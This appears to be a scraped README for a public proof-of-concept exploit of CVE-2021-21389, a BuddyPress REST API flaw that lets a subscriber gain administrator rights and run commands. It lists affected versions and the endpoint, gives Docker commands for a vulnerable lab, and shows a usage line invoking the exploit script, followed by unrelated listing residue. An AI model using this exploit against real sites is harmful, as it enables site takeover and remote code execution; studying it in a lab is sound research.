CVE-2021-21389
BuddyPress < 7.2.1 - REST API Privilege Escalation to RCE
PoC (Full)
Affected version: 5.0.0 to 7.2.0
User requirement: Subscriber user
Method: Privilege Escalation to Administrator and trigger RCE via REST API
Endpoint: /v1/members/me endpoint.
How to use Docker
git clone https://github.com/HoangKien1020/CVE-2021-21389
cd CVE-2021-21389/
docker build . -t hoangkien1020/buddypress:cve202121389
docker run -d --rm -it -p 8080:80 hoangkien1020/buddypress:cve202121389
Other way to pull this docker instead of building:
docker pull hoangkien1020/buddypress:cve202121389
docker run -d --rm -it -p 8080:80 hoangkien1020/buddypress:cve202121389
Access your host/IP
Ex: http://test.local:8080
How to exploit
python3 CVE-2021-21389.py http://test.local:8080 test 1234 whoami
Example:
Reference
https://buddypress.org/2021/03/buddypress-7-2-1-security-release/
2 Jun 04, 2021
[email protected]">
388 Dec 27, 2022
1.8k Jan 04, 2023
4 Jan 13, 2022
1 Nov 11, 2021
1.9k Dec 26, 2022
3 Sep 03, 2022
45 Sep 21, 2022
10 Dec 30, 2022
59 Dec 01, 2022
16 Dec 18, 2022
48 Nov 26, 2022
12 Dec 02, 2022
13 Nov 09, 2022
698 Dec 09, 2022
46 Nov 12, 2022
70 Nov 30, 2022
6 Jun 05, 2022
7 Dec 07, 2022
20 Apr 07, 2022